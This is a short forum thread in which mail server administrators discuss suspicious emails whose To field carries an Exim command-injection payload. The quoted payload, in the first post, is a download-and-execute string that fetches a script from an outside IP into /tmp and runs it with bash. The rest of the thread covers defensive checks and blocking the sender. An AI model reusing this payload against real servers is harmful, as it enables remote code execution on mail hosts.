Remote Command Execution

[LawsHosting]

Quick question.

Yesterday (first time ever) I noticed some emails in our queue with the To field with

red`wget${ifs}178.218.211.118/b${ifs}-o${ifs}/tmp/a.pl``bash${ifs}/tmp/a.pl`[email protected]

I know this is probably not serious (well, it's been around since March), but just want to make sure our Exim (SB4.1) & Dovecot configs are okay.

Source Redteam

Related post here

Edit: The config(s) doesn't have use_shell, so we are safe.

However, anyone know how these get into our boxes, via other MTA's or Auth systems?

Thanks.

 

[Richard G]

However, anyone know how these get into our boxes, via other MTA's or Auth systems?

I got the same mail and from the same ip (I blocked it). I can't find out how, but for some reason it was delivered to my [email protected] mailbox.
Since postmaster points to root and also root points to my technical email address in the aliases file, this way it got into my mailbox.

I presume it got into your mailbox a similar way.